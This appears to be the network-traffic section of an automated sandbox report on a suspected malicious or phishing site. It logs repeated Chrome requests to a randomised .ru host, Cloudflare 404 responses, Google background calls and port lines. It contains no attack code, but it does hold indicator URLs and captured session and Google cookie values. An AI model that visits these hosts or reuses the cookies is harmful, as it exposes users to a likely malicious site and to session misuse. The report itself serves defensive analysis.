          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urr HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6py3MCJoa2541Lb6/6Q7zPL1PIdTL1B HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6py3MCJoa2541Lb6/6Q7zPL1PIdTL1B HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6UFXgkkNqmgDOtNY/3c90WBkIQ HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6MJXQo9maP/2azpv8urr HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?er HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/30VyqDe0V3Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/0AAZf0BPQd1iVI?er HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6qTbSZFQpomlh5Jo/1emrd6kgjeh HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6hrZFScQzDHfHo/7DKiMCzMdg1 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/67sTSha9SVztfp/8jL0dJTGopn HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY2 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjf HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVk HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/VyRsmGftiIlOxrabXBIOtQtS/925oSlCqhBF56mV?0AAZf0BPQd1iVI?erAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6e8shUBSyBsuzja/3yrFiatHkI5jfZY2 HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/6UjhZnuFkmp/6aInfUMVk HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /VyRsmGftiIlOxrabXBIOtQtS/60DNPihs9uJ6rEVU/2qVT4IAbiSHSjf HTTP/1.1Host: bggcwvekn3axi3ffz5ai.rvucouijw.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr
          Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000825ED79361 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
          Source: unknownDNS traffic detected: queries for: clients2.google.com
          Source: unknownHTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=511=LtGInZ4I4WDrCvCHQBVMHOy4a-sqzpSrMO-Rwr8ezStTz_kfoi2bri7uGdXfNvskAEO_Tj5Jkwl0XSN-qA6MYiGShcDB_vNQOl1bpl3aua7gMrDRvWsHLpAuFBlBnNxTMeen95XElzx3r4myG8p8sgSHdx4NBawYGaI5oFn_dZ8
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:41:28 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeset-cookie: PHPSESSID=ls834djnk0rde6vlt948asvcmr; path=/expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=x3TYwlaqsyOhwm2S9MZBAtjo4fPOvx4m1v39y%2FH8AGcQh6la3Zr%2BBsw1d2tnhxGnOhEclm9BX1Fj6pROtWkg8OpxCIGtAbcMnafyA4FSdPAL7pzaDAIYlcKWwRevy%2BbV78aJZ653j4vwfynH4f5vEhwVv9w%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92c737a2bb178-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:41:32 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecache-control: private, no-cache, max-age=0pragma: no-cachevary: Accept-EncodingCF-Cache-Status: BYPASSReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=iQpe7vFgq4a0RfM9sG3svu1%2F%2Fk%2FmnIyVrkB4BMKn0ohhYuWui%2BrxjUvCArdZTYd4fdwexIcO%2BAqBvZZe%2FrC8MRcb3K80qV%2BGYo9FYlbzkMJtWFtqYxWZATlN8kA37kg%2BlovvFRw1bEtbR0%2Fu3hI8GlU079s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92c8b2d78678a-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:41:48 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeaccess-control-allow-origin: *expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cacheCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WDnUVKhNSR%2FqvgBD3RgYP8B15HN6dQztYufrE%2F0eovsgF5Bq0pMW6g8nLOdYU2FvQsQOwFhkXk6i0g8O0CBZeDibtLUq2tzJXv8%2FTn46BOXF7ZmK80nI%2FhXokijYCw7sEZpE%2FITNPUTGgsbgO47wMKSbEOw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92cef99ee6736-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:41:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NT4IESajyZVw%2FoGJ0yMPGZkJIdyjT1GgdfX2irJiJuNZi49KG3uuwuqHlv1RAgYOTnuqIOg6ZZaFbBqOwxRpmnU%2FpESEdd9TIdg0KbG5sVB2DFYqdUYuJ0FVunoVtJW%2FNVrkPsrn5eWMBtuLhaIgesrYYFY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92cf89a17137d-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:41:51 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jiThYh%2B3F5aN4TrsdvLGj%2BAuklTACJbbaESZhCYAkMwL3R0C2ux0IhhdxW3%2BsT0mm%2FPYGorhQXW2q7%2F%2BYvlMc8ULRsfnNbLfqq0LvckY85P5r3CFFlhZjfhCW3WiVb4d%2FClh9yDkIKH1XtY85qJug6ON1gs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92d02adfa6777-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:42:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GNHKHKeBPv28krxw0T6kaXNX72X7kbpa3Rip%2BN1C731Q719vgZvNsUYUSP4sl56UYtdJf4Tatq7zSlfPmlDueSkLEXZoajauMNDaKOf7Ty2zgtq5nTCdi%2Fu6eL8We7Uh3y99zdOP4MUJtF7SHnc2jZZbphw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92d892ddd4519-ATLalt-svc: h3=":443"; ma=86400
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jan 2024 13:42:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeexpires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidatepragma: no-cachevary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xR1xCJfh0jfr4MRg7E4rEwMxy4mEvhw8FqMHKCAok5%2BHfGappA71BU0y8USyVfQgF7xMIcC5ANfdUxp5lBVs9tyoniTaYT9y6WW78jIPmBXxCutCX08%2FzLWkViyzHnFwl4z4miS0EpwIIooOMAp%2Bgvu2Lxc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 84b92dc3383d6735-ATLalt-svc: h3=":443"; ma=86400
          Source: chromecache_100.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_100.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
          Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
          Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
          Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
